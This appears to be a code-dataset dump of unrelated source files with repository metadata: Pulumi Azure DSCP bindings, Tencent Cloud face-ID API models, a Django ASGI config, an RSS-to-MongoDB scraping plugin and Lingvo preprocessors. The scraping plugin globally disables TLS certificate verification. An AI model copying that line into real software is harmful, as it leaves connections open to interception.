if qos_definition_collection and not isinstance(qos_definition_collection, list):
raise TypeError("Expected argument 'qos_definition_collection' to be a list")
pulumi.set(__self__, "qos_definition_collection", qos_definition_collection)
if resource_guid and not isinstance(resource_guid, str):
raise TypeError("Expected argument 'resource_guid' to be a str")
pulumi.set(__self__, "resource_guid", resource_guid)
if source_ip_ranges and not isinstance(source_ip_ranges, list):
raise TypeError("Expected argument 'source_ip_ranges' to be a list")
pulumi.set(__self__, "source_ip_ranges", source_ip_ranges)
if source_port_ranges and not isinstance(source_port_ranges, list):
raise TypeError("Expected argument 'source_port_ranges' to be a list")
pulumi.set(__self__, "source_port_ranges", source_port_ranges)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="associatedNetworkInterfaces")
def associated_network_interfaces(self) -> Sequence['outputs.NetworkInterfaceResponse']:
"""
Associated Network Interfaces to the DSCP Configuration.
"""
return pulumi.get(self, "associated_network_interfaces")
@property
@pulumi.getter(name="destinationIpRanges")
def destination_ip_ranges(self) -> Optional[Sequence['outputs.QosIpRangeResponse']]:
"""
Destination IP ranges.
"""
return pulumi.get(self, "destination_ip_ranges")
@property
@pulumi.getter(name="destinationPortRanges")
def destination_port_ranges(self) -> Optional[Sequence['outputs.QosPortRangeResponse']]:
"""
Destination port ranges.
"""
return pulumi.get(self, "destination_port_ranges")
@property
@pulumi.getter
def etag(self) -> str:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def markings(self) -> Optional[Sequence[int]]:
"""
List of markings to be used in the configuration.
"""
return pulumi.get(self, "markings")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def protocol(self) -> Optional[str]:
"""
RNM supported protocol types.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the DSCP Configuration resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="qosCollectionId")
def qos_collection_id(self) -> str:
"""
Qos Collection ID generated by RNM.
"""
return pulumi.get(self, "qos_collection_id")
@property
@pulumi.getter(name="qosDefinitionCollection")
def qos_definition_collection(self) -> Optional[Sequence['outputs.QosDefinitionResponse']]:
"""
QoS object definitions
"""
return pulumi.get(self, "qos_definition_collection")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> str:
"""
The resource GUID property of the DSCP Configuration resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter(name="sourceIpRanges")
def source_ip_ranges(self) -> Optional[Sequence['outputs.QosIpRangeResponse']]:
"""
Source IP ranges.
"""
return pulumi.get(self, "source_ip_ranges")
@property
@pulumi.getter(name="sourcePortRanges")
def source_port_ranges(self) -> Optional[Sequence['outputs.QosPortRangeResponse']]:
"""
Sources port ranges.
"""
return pulumi.get(self, "source_port_ranges")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetDscpConfigurationResult(GetDscpConfigurationResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDscpConfigurationResult(
associated_network_interfaces=self.associated_network_interfaces,
destination_ip_ranges=self.destination_ip_ranges,
destination_port_ranges=self.destination_port_ranges,
etag=self.etag,
id=self.id,
location=self.location,
markings=self.markings,
name=self.name,
protocol=self.protocol,
provisioning_state=self.provisioning_state,
qos_collection_id=self.qos_collection_id,
qos_definition_collection=self.qos_definition_collection,
resource_guid=self.resource_guid,
source_ip_ranges=self.source_ip_ranges,
source_port_ranges=self.source_port_ranges,
tags=self.tags,
type=self.type)
def get_dscp_configuration(dscp_configuration_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDscpConfigurationResult:
"""
Differentiated Services Code Point configuration for any given network interface
:param str dscp_configuration_name: The name of the resource.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['dscpConfigurationName'] = dscp_configuration_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20210501:getDscpConfiguration', __args__, opts=opts, typ=GetDscpConfigurationResult).value
return AwaitableGetDscpConfigurationResult(
associated_network_interfaces=__ret__.associated_network_interfaces,
destination_ip_ranges=__ret__.destination_ip_ranges,
destination_port_ranges=__ret__.destination_port_ranges,
etag=__ret__.etag,
id=__ret__.id,
location=__ret__.location,
markings=__ret__.markings,
name=__ret__.name,
protocol=__ret__.protocol,
provisioning_state=__ret__.provisioning_state,
qos_collection_id=__ret__.qos_collection_id,
qos_definition_collection=__ret__.qos_definition_collection,
resource_guid=__ret__.resource_guid,
source_ip_ranges=__ret__.source_ip_ranges,
source_port_ranges=__ret__.source_port_ranges,
tags=__ret__.tags,
type=__ret__.type)
@_utilities.lift_output_func(get_dscp_configuration)
def get_dscp_configuration_output(dscp_configuration_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetDscpConfigurationResult]:
"""
Differentiated Services Code Point configuration for any given network interface
:param str dscp_configuration_name: The name of the resource.
:param str resource_group_name: The name of the resource group.
"""
...
| [
"[email protected]"
] | |
4de5d342f5f6db3ec70d35c5b46c60132fe5dbc6 | fae0af723a5d2b41fa57e5cc0bec700974440069 | /tencentcloud/faceid/v20180301/models.py | a078bf16f7239b59287d4ff2c20a108960d6620c | [
"Apache-2.0"
] | permissive | simiaoxiaoseng/tencentcloud-sdk-python | dc319b492967044bf08756a7591e06d70f6d1e4b | e93b2291526946fd2381fc9e40f7f4c7f34c7c42 | refs/heads/master | 2020-04-12T19:11:46.876644 | 2018-12-20T13:39:13 | 2018-12-20T13:39:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,143 | py | # -*- coding: utf8 -*-
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tencentcloud.common.abstract_model import AbstractModel
class DetectAuthRequest(AbstractModel):
"""DetectAuth请求参数结构体
"""
def __init__(self):
"""
:param RuleId: 用于细分客户使用场景,由腾讯侧在线下对接时分配。
:type RuleId: str
:param TerminalType: 本接口不需要传递此参数。
:type TerminalType: str
:param IdCard: 身份标识(与公安权威库比对时必须是身份证号)。
规则:a-zA-Z0-9组合。最长长度32位。
:type IdCard: str
:param Name: 姓名。最长长度32位。
:type Name: str
:param RedirectUrl: 认证结束后重定向的回调链接地址。最长长度1024位。
:type RedirectUrl: str
:param Extra: 透传字段,在获取验证结果时返回。
:type Extra: str
:param ImageBase64: 用于人脸比对的照片,图片的BASE64值;
BASE64编码后的图片数据大小不超过3M,仅支持jpg、png格式。
:type ImageBase64: str
"""
self.RuleId = None
self.TerminalType = None
self.IdCard = None
self.Name = None
self.RedirectUrl = None
self.Extra = None
self.ImageBase64 = None
def _deserialize(self, params):
self.RuleId = params.get("RuleId")
self.TerminalType = params.get("TerminalType")
self.IdCard = params.get("IdCard")
self.Name = params.get("Name")
self.RedirectUrl = params.get("RedirectUrl")
self.Extra = params.get("Extra")
self.ImageBase64 = params.get("ImageBase64")
class DetectAuthResponse(AbstractModel):
"""DetectAuth返回参数结构体
"""
def __init__(self):
"""
:param Url: 用于发起核身流程的URL,仅微信H5场景使用。
:type Url: str
:param BizToken: 一次核身流程的标识,有效时间为7,200秒;
完成核身后,可用该标识获取验证结果信息。
:type BizToken: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.Url = None
self.BizToken = None
self.RequestId = None
def _deserialize(self, params):
self.Url = params.get("Url")
self.BizToken = params.get("BizToken")
self.RequestId = params.get("RequestId")
class GetActionSequenceRequest(AbstractModel):
"""GetActionSequence请求参数结构体
"""
class GetActionSequenceResponse(AbstractModel):
"""GetActionSequence返回参数结构体
"""
def __init__(self):
"""
:param ActionSequence: 动作顺序(2,1 or 1,2) 。1代表张嘴,2代表闭眼。
:type ActionSequence: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.ActionSequence = None
self.RequestId = None
def _deserialize(self, params):
self.ActionSequence = params.get("ActionSequence")
self.RequestId = params.get("RequestId")
class GetDetectInfoRequest(AbstractModel):
"""GetDetectInfo请求参数结构体
"""
def __init__(self):
"""
:param BizToken: 人脸核身流程的标识,调用DetectAuth接口时生成。
:type BizToken: str
:param RuleId: 用于细分客户使用场景,由腾讯侧在线下对接时分配。
:type RuleId: str
:param InfoType: 指定拉取的结果信息,取值(0:全部;1:文本类;2:身份证正反面;3:视频最佳截图照片;4:视频)。
如 134表示拉取文本类、视频最佳截图照片、视频。
:type InfoType: str
"""
self.BizToken = None
self.RuleId = None
self.InfoType = None
def _deserialize(self, params):
self.BizToken = params.get("BizToken")
self.RuleId = params.get("RuleId")
self.InfoType = params.get("InfoType")
class GetDetectInfoResponse(AbstractModel):
"""GetDetectInfo返回参数结构体
"""
def __init__(self):
"""
:param DetectInfo: JSON字符串。
{
// 文本类信息
"Text": {
"ErrCode": null, // 本次核身最终结果。0为成功
"ErrMsg": null, // 本次核身的错误信息。
"IdCard": "", // 本次核身最终获得的身份证号。
"Name": "", // 本次核身最终获得的姓名。
"OcrNation": null, // ocr阶段获取的民族
"OcrAddress": null, // ocr阶段获取的地址
"OcrBirth": null, // ocr阶段获取的出生信息
"OcrAuthority": null, // ocr阶段获取的证件签发机关
"OcrValidDate": null, // ocr阶段获取的证件有效期
"OcrName": null, // ocr阶段获取的姓名
"OcrIdCard": null, // ocr阶段获取的身份证号
"OcrGender": null, // ocr阶段获取的性别
"LiveStatus": null, // 活体检测阶段的错误码。0为成功
"LiveMsg": null, // 活体检测阶段的错误信息
"Comparestatus": null,// 一比一阶段的错误码。0为成功
"Comparemsg": null, // 一比一阶段的错误信息
"Extra": "", // DetectAuth结果传进来的Extra信息
"Detail": { // 活体一比一信息详情
"LivenessData": []
}
},
// 身份证正反面照片Base64
"IdCardData": {
"OcrFront": null,
"OcrBack": null
},
// 视频最佳帧截图Base64
"BestFrame": {
"BestFrame": null
},
// 活体视频Base64
"VideoData": {
"LivenessVideo": null
}
}
:type DetectInfo: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.DetectInfo = None
self.RequestId = None
def _deserialize(self, params):
self.DetectInfo = params.get("DetectInfo")
self.RequestId = params.get("RequestId")
class GetLiveCodeRequest(AbstractModel):
"""GetLiveCode请求参数结构体
"""
class GetLiveCodeResponse(AbstractModel):
"""GetLiveCode返回参数结构体
"""
def __init__(self):
"""
:param LiveCode: 数字验证码,如:1234
:type LiveCode: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.LiveCode = None
self.RequestId = None
def _deserialize(self, params):
self.LiveCode = params.get("LiveCode")
self.RequestId = params.get("RequestId")
class ImageRecognitionRequest(AbstractModel):
"""ImageRecognition请求参数结构体
"""
def __init__(self):
"""
:param IdCard: 身份证号
:type IdCard: str
:param Name: 姓名
:type Name: str
:param ImageBase64: 用于人脸比对的照片,图片的BASE64值;
BASE64编码后的图片数据大小不超过3M,仅支持jpg、png格式。
:type ImageBase64: str
:param Optional: 本接口不需要传递此参数。
:type Optional: str
"""
self.IdCard = None
self.Name = None
self.ImageBase64 = None
self.Optional = None
def _deserialize(self, params):
self.IdCard = params.get("IdCard")
self.Name = params.get("Name")
self.ImageBase64 = params.get("ImageBase64")
self.Optional = params.get("Optional")
class ImageRecognitionResponse(AbstractModel):
"""ImageRecognition返回参数结构体
"""
def __init__(self):
"""
:param Sim: 相似度,取值范围 [0.00, 100.00]。推荐相似度大于等于70时可判断为同一人,可根据具体场景自行调整阈值(阈值70的误通过率为千分之一,阈值80的误通过率是万分之一)
:type Sim: float
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.Sim = None
self.RequestId = None
def _deserialize(self, params):
self.Sim = params.get("Sim")
self.RequestId = params.get("RequestId")
class LivenessCompareRequest(AbstractModel):
"""LivenessCompare请求参数结构体
"""
def __init__(self):
"""
:param ImageBase64: 用于人脸比对的照片,图片的BASE64值;
BASE64编码后的图片数据大小不超过3M,仅支持jpg、png格式。
:type ImageBase64: str
:param VideoBase64: 用于活体检测的视频,视频的BASE64值;
BASE64编码后的大小不超过5M,支持mp4、avi、flv格式。
:type VideoBase64: str
:param LivenessType: 活体检测类型,取值:LIP/ACTION/SILENT。
LIP为数字模式,ACTION为动作模式,SILENT为静默模式,三种模式选择一种传入。
:type LivenessType: str
:param ValidateData: 数字模式传参:唇语验证码(1234),需先获取唇语验证码;
动作模式传参:传动作顺序(12,21),需先获取动作顺序;
静默模式传参:空。
:type ValidateData: str
:param Optional: 本接口不需要传递此参数。
:type Optional: str
"""
self.ImageBase64 = None
self.VideoBase64 = None
self.LivenessType = None
self.ValidateData = None
self.Optional = None
def _deserialize(self, params):
self.ImageBase64 = params.get("ImageBase64")
self.VideoBase64 = params.get("VideoBase64")
self.LivenessType = params.get("LivenessType")
self.ValidateData = params.get("ValidateData")
self.Optional = params.get("Optional")
class LivenessCompareResponse(AbstractModel):
"""LivenessCompare返回参数结构体
"""
def __init__(self):
"""
:param BestFrameBase64: 验证通过后的视频最佳截图照片,照片为BASE64编码后的值,jpg格式。
:type BestFrameBase64: str
:param Sim: 相似度,取值范围 [0.00, 100.00]。推荐相似度大于等于70时可判断为同一人,可根据具体场景自行调整阈值(阈值70的误通过率为千分之一,阈值80的误通过率是万分之一)。
:type Sim: float
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.BestFrameBase64 = None
self.Sim = None
self.RequestId = None
def _deserialize(self, params):
self.BestFrameBase64 = params.get("BestFrameBase64")
self.Sim = params.get("Sim")
self.RequestId = params.get("RequestId")
class LivenessRecognitionRequest(AbstractModel):
"""LivenessRecognition请求参数结构体
"""
def __init__(self):
"""
:param IdCard: 身份证号
:type IdCard: str
:param Name: 姓名
:type Name: str
:param VideoBase64: 用于活体检测的视频,视频的BASE64值;
BASE64编码后的大小不超过5M,支持mp4、avi、flv格式。
:type VideoBase64: str
:param LivenessType: 活体检测类型,取值:LIP/ACTION/SILENT。
LIP为数字模式,ACTION为动作模式,SILENT为静默模式,三种模式选择一种传入。
:type LivenessType: str
:param ValidateData: 数字模式传参:唇语验证码(1234),需先获取唇语验证码;
动作模式传参:传动作顺序(12,21),需先获取动作顺序;
静默模式传参:空。
:type ValidateData: str
:param Optional: 本接口不需要传递此参数。
:type Optional: str
"""
self.IdCard = None
self.Name = None
self.VideoBase64 = None
self.LivenessType = None
self.ValidateData = None
self.Optional = None
def _deserialize(self, params):
self.IdCard = params.get("IdCard")
self.Name = params.get("Name")
self.VideoBase64 = params.get("VideoBase64")
self.LivenessType = params.get("LivenessType")
self.ValidateData = params.get("ValidateData")
self.Optional = params.get("Optional")
class LivenessRecognitionResponse(AbstractModel):
"""LivenessRecognition返回参数结构体
"""
def __init__(self):
"""
:param BestFrameBase64: 验证通过后的视频最佳截图照片,照片为BASE64编码后的值,jpg格式。
:type BestFrameBase64: str
:param Sim: 相似度,取值范围 [0.00, 100.00]。推荐相似度大于等于70时可判断为同一人,可根据具体场景自行调整阈值(阈值70的误通过率为千分之一,阈值80的误通过率是万分之一)
:type Sim: float
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.BestFrameBase64 = None
self.Sim = None
self.RequestId = None
def _deserialize(self, params):
self.BestFrameBase64 = params.get("BestFrameBase64")
self.Sim = params.get("Sim")
self.RequestId = params.get("RequestId") | [
"[email protected]"
] | |
d41da186fe71beeba5d6a5db47eb2df882f9a820 | 44221bc0507955c1e62d256182291ac95514c4f6 | /automatron_notify/__init__.py | e4ef215bc2aaa375436f09977691bf480f1315f1 | [
"MIT"
] | permissive | automatron/automatron-notify | 8c14ee5d8025ebefc7e9b7788e5414230c269676 | 4dcacfb3a56a51a7d1a7521f2ab9f7a895493f1a | refs/heads/master | 2021-01-17T14:31:31.323071 | 2014-03-25T08:18:46 | 2014-03-25T08:18:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | from automatron.core.event import IAutomatronEventHandler
class IAutomatronNotifyHandler(IAutomatronEventHandler):
def on_notify(server, username, title, body, body_as_html=None):
"""
Called when a notification is triggered.
"""
| [
"[email protected]"
] | |
321adce537d7842bc56ed5889f848d7433663330 | 4b8d6d0c057049beabdc7a516bd0653af94894a6 | /DRF_nextjs/asgi.py | c3274d19c1591f6d6331af69cbe01c1a6e03c5b4 | [] | no_license | felipefoc/DRF-Next.Js | 71a4d35cd2f69ffe84fb76b37a7094cc2950a71f | f8a904ec17d21e88590719ba98202d9fbcccf11e | refs/heads/main | 2023-03-14T18:51:55.521287 | 2021-03-22T04:15:32 | 2021-03-22T04:15:32 | 350,203,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
ASGI config for DRF_nextjs project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DRF_nextjs.settings')
application = get_asgi_application()
| [
"[email protected]"
] | |
141c85f367df5664a2789b37bc7d83c97dc4a197 | b5a29700c3516cf12f837e2284e3844546205d09 | /plugins/vipread_generic_plugin.py | 2771bd40386bf812df6f131de4bd2ab09fe0bf1a | [] | no_license | p1g3/Collect-Info-Research | f609823486f36460186cfde27f4be7c9c5a058ae | e8e7366677a8642c3bcf4b103e43378762e6673c | refs/heads/master | 2020-12-24T03:59:01.190032 | 2020-01-31T06:47:35 | 2020-01-31T06:47:35 | 237,374,792 | 37 | 12 | null | null | null | null | UTF-8 | Python | false | false | 1,913 | py |
import asyncio
import feedparser
import ssl
import pymongo
from loguru import logger
import datetime
from dateutil import parser
class vipread_generic_plugin:
def __init__(self,loop,collection,lock):
ssl._create_default_https_context = ssl._create_unverified_context
self.headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}
self.loop = loop
self.rss = 'http://vipread.com/feed'
self.collection = collection
self.type = 'generic'
self.lock = lock
async def return_result(self):
logger.info("{} is running.",self.__class__.__name__)
future = self.loop.run_in_executor(None,feedparser.parse,self.rss)
try:
parse_result = await asyncio.wait_for(future, 10, loop=self.loop)
except:
logger.warning("{} parse time out".format(self.rss))
return
if parse_result.has_key('entries'):
entries = parse_result['entries']
format_time = datetime.date.today()
for entrie in entries:
article_time = parser.parse(entrie['updated'])
if (article_time.year == format_time.year) and (article_time.month == format_time.month) and (article_time.day == format_time.day):
add_dict = {'type':self.type,'title':entrie['title'],'link':entrie['link'],'is_send':0}
try:
await self.lock
if self.collection.count_documents({'link':entrie['link']}) < 1:
self.collection.insert_one(add_dict)
logger.info('[Generic] {} {}'.format(entrie['title'],entrie['link']))
finally:
self.lock.release()
else:
logger.error('[Error Parse] {}',self.rss)
if __name__ == '__main__':
client = pymongo.MongoClient(host='localhost', port=27017)
db = client.info_collect
collection = db['infos']
lock = asyncio.Lock()
loop = asyncio.get_event_loop()
class_name = vipread_generic_plugin(loop,collection,lock)
loop.run_until_complete(class_name.return_result())
| [
"[email protected]"
] | |
80939f748aac5f3242ea0bc5610644cacf4f8ba9 | d31d744f62c09cb298022f42bcaf9de03ad9791c | /lingvo/lingvo/tasks/car/input_preprocessors.py | 5848311b990c04f1afc36ede62048283bad93104 | [
"Apache-2.0"
] | permissive | yuhuofei/TensorFlow-1 | b2085cb5c061aefe97e2e8f324b01d7d8e3f04a0 | 36eb6994d36674604973a06159e73187087f51c6 | refs/heads/master | 2023-02-22T13:57:28.886086 | 2021-01-26T14:18:18 | 2021-01-26T14:18:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136,426 | py | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Input preprocessors."""
from lingvo import compat as tf
from lingvo.core import base_layer
from lingvo.core import py_utils
from lingvo.core import schedule
from lingvo.tasks.car import car_lib
from lingvo.tasks.car import detection_3d_lib
from lingvo.tasks.car import geometry
from lingvo.tasks.car import ops
import numpy as np
# pylint:disable=g-direct-tensorflow-import
from tensorflow.python.ops import inplace_ops
# pylint:enable=g-direct-tensorflow-import
def _ConsistentShuffle(tensors, seed):
"""Shuffle multiple tensors with the same shuffle order."""
shuffled_idx = tf.range(tf.shape(tensors[0])[0])
shuffled_idx = tf.random.shuffle(shuffled_idx, seed=seed)
return tuple([tf.gather(t, shuffled_idx) for t in tensors])
def _GetApplyPointMaskFn(points_mask):
"""Returns a function that applies a mask to one of our points tensors."""
def _ApplyPointMaskFn(points_tensor):
"""Applies a mask to the points tensor."""
if points_tensor is None:
return points_tensor
return tf.boolean_mask(points_tensor, points_mask)
return _ApplyPointMaskFn
def _Dense(sparse):
return tf.sparse_to_dense(
sparse_indices=sparse.indices,
output_shape=sparse.dense_shape,
sparse_values=sparse.values,
default_value=0)
class Preprocessor(base_layer.BaseLayer):
"""Base class for input preprocessor.
Input preprocessors expect the combined output of all extractors and performs
a transformation on them. Input preprocessors can add/edit/remove fields
from the NestedMap of features.
Note: Features correspond to that for one example (no batch dimension).
Sub-classes need to implement the following three functions:
1) TransformFeatures(features): Given a NestedMap of features representing the
output of all the extractors, apply a transformation on the features.
2) TransformShapes(shapes): Given a corresponding NestedMap of shapes,
produce a NestedMap of shapes that corresponds to the transformation of the
features after TransformFeatures.
3) TransformDTypes(dtypes): Given a corresponding NestedMap of dtypes,
produce a NestedMap of dtypes that corresponds to the transformation of the
features after TransformFeatures.
The preprocessor is expected to explicitly pass through untouched fields.
For example, a preprocessor that does data augmentation should modify the
features NestedMap on the fields it cares about augmenting, and then return
the features NestedMap.
"""
@classmethod
def Params(cls):
"""Default params."""
p = super().Params()
p.name = cls.__name__
return p
def FProp(self, theta, features):
"""Performs TransformFeatures."""
del theta # unused
return self.TransformFeatures(features)
def TransformFeatures(self, features):
"""Transforms the features for one example.
Args:
features: A `NestedMap` of tensors.
Returns:
A `NestedMap` of tensors corresponding.
"""
raise NotImplementedError()
def TransformShapes(self, shapes):
"""Sets correct shapes corresponding to TransformFeatures.
Args:
shapes: A `NestedMap` of TensorShapes, corresponding to the
pre-transformed features.
Returns:
A `NestedMap` of TensorShapes corresponding to the transformed features.
"""
raise NotImplementedError()
def TransformDTypes(self, dtypes):
"""Sets correct dtypes corresponding to TransformFeatures.
Args:
dtypes: A `NestedMap` of DTypes, corresponding to the pre-transformed
features.
Returns:
A `NestedMap` of DTypes corresponding to the transformed features.
"""
raise NotImplementedError()
class EntryPreprocessor(Preprocessor):
"""A Preprocessor that transforms a NestedMap sub-structure.
Some preprocessors want to apply a function to any NestedMap whose key matches
a specific prefix. An EntryPreprocessor provides an interface for specifying
the function transformation for a NestedMap of inputs, adding, modifying, or
deleting the entries in that NestedMap.
For example, if an input contains a nested structure such as:
- lasers.front.xyz
.features
- lasers.side.xyz
.features
and one wants to apply a transform that modifies the .xyz features
on both structures, one can define an EntryPreprocessor that implements:
UpdateEntry(entry):
UpdateEntryShape(shapes):
UpdateEntryDType(dtypes):
and set self.params.prefixes = ['lasers.front', 'lasers.side']
where the prefixes refer to a fully-qualified NestedMap sub-structure.
The arguments to these functions will contain just the NestedMap structure
whose key prefix can be found in self.params.prefixes. One can then modify
these structures as desired.
Example:
def UpdateEntry(self, entry):
# entry is a NestedMap.
assert 'xyz' in entry
entry.xyz = self._ApplyFn(entry.xyz)
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('prefixes', ['pseudo_ri'], 'List of keys to apply to.')
return p
def _ApplyToMatchingStructure(self, nested_map, fn):
"""Apply fn to any NestedMap sub-structure whose prefix is in p.prefixes."""
p = self.params
# Don't mutate the original.
nested_map = nested_map.DeepCopy()
updated_entries = []
for prefix in p.prefixes:
entry = nested_map.GetItem(prefix)
if not isinstance(entry, py_utils.NestedMap):
raise TypeError('Prefix key {} selected a {}, not a NestedMap!'.format(
prefix, type(entry)))
fn(entry)
updated_entries.append(entry)
return nested_map, updated_entries
def UpdateEntry(self, entry):
"""Update the Tensors in a NestedMap entry.
Args:
entry: A NestedMap of Tensors.
"""
raise NotImplementedError()
def UpdateEntryShape(self, shapes):
"""Update the shapes in a NestedMap entry.
Args:
shapes: A NestedMap of TensorShapes.
"""
raise NotImplementedError()
def UpdateEntryDType(self, dtypes):
"""Transform the dtypes in a NestedMap entry.
Args:
dtypes: A NestedMap of dtypes.
"""
raise NotImplementedError()
def TransformFeatures(self, features):
features, _ = self._ApplyToMatchingStructure(features, self.UpdateEntry)
return features
def TransformShapes(self, shapes):
shapes, _ = self._ApplyToMatchingStructure(shapes, self.UpdateEntryShape)
return shapes
def TransformDTypes(self, dtypes):
dtypes, _ = self._ApplyToMatchingStructure(dtypes, self.UpdateEntryDType)
return dtypes
class CreateDecoderCopy(Preprocessor):
"""Creates references to current lasers, images, and labels.
This is useful if the data is further transformed.
If desired, the keys that are copied can be customized by overriding the
default keys param.
This preprocessor expects features to optionally contain the following keys:
- lasers - a NestedMap of tensors
- images - a NestedMap of tensors
- labels - a NestedMap of tensors
Adds the following features (if the features existed):
- decoder_copy.lasers - a copy of the lasers NestedMap
- decoder_copy.images - a copy of the images NestedMap
- decoder_copy.labels - a copy of the labels NestedMap
The processor also by default pads the laser features; this can be disabled
by setting the pad_lasers param to None.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('keys', ['lasers', 'labels', 'images'],
'Keys to look for and copy if exists.')
p.Define('parent_key', 'decoder_copy', 'The key to nest the copies under.')
p.Define('pad_lasers', PadLaserFeatures.Params(),
'Params for a layer that pads the laser features.')
p.name = 'create_decoder_copy'
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.pad_lasers is not None:
self.CreateChild('pad_lasers', p.pad_lasers)
def _DeepCopyIfExists(self, keys, nested_map, parent_key):
"""Deep copy a specific key to a parent key if it exists."""
for key in keys:
if key in nested_map:
if parent_key not in nested_map:
nested_map[parent_key] = py_utils.NestedMap()
nested_map[parent_key][key] = nested_map[key].DeepCopy()
return nested_map
def TransformFeatures(self, features):
p = self.params
features = self._DeepCopyIfExists(p.keys, features, p.parent_key)
if p.pad_lasers is not None:
features[p.parent_key] = self.pad_lasers.TransformFeatures(
features[p.parent_key])
return features
def TransformShapes(self, shapes):
p = self.params
shapes = self._DeepCopyIfExists(p.keys, shapes, p.parent_key)
if p.pad_lasers is not None:
shapes[p.parent_key] = self.pad_lasers.TransformShapes(
shapes[p.parent_key])
return shapes
def TransformDTypes(self, dtypes):
p = self.params
dtypes = self._DeepCopyIfExists(p.keys, dtypes, p.parent_key)
if p.pad_lasers is not None:
dtypes[p.parent_key] = self.pad_lasers.TransformDTypes(
dtypes[p.parent_key])
return dtypes
class FilterByKey(Preprocessor):
"""Filters features to keep only specified keys.
This keeps only feature entries that are specified. This allows us to reduce
the number of fields returned. For example, during training, one may not
need the actual laser points if training with a pillars based model that
has a preprocessor that already maps the points to grid.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'keep_key_prefixes', [''], 'Prefixes of keys to keep. If this '
'contains the empty string, then it will keep all the keys.')
return p
def _FilterFn(self, key, entry):
"""Filter a nested map."""
del entry # unused
p = self.params
for prefix in p.keep_key_prefixes:
if key.startswith(prefix):
return True
return False
def TransformFeatures(self, features):
return features.FilterKeyVal(self._FilterFn)
def TransformShapes(self, shapes):
return shapes.FilterKeyVal(self._FilterFn)
def TransformDTypes(self, dtypes):
return dtypes.FilterKeyVal(self._FilterFn)
class FilterGroundTruthByNumPoints(Preprocessor):
"""Removes ground truth boxes with less than params.min_num_points points.
This preprocessor expects features to contain the following keys::
labels.labels of shape [..., L]
labels.bboxes_3d of shape [..., L, 7]
labels.bboxes_3d_mask of shape [..., L]
labels.unfiltered_bboxes_3d_mask of shape [..., L]
labels.bboxes_3d_num_points of shape [..., L].
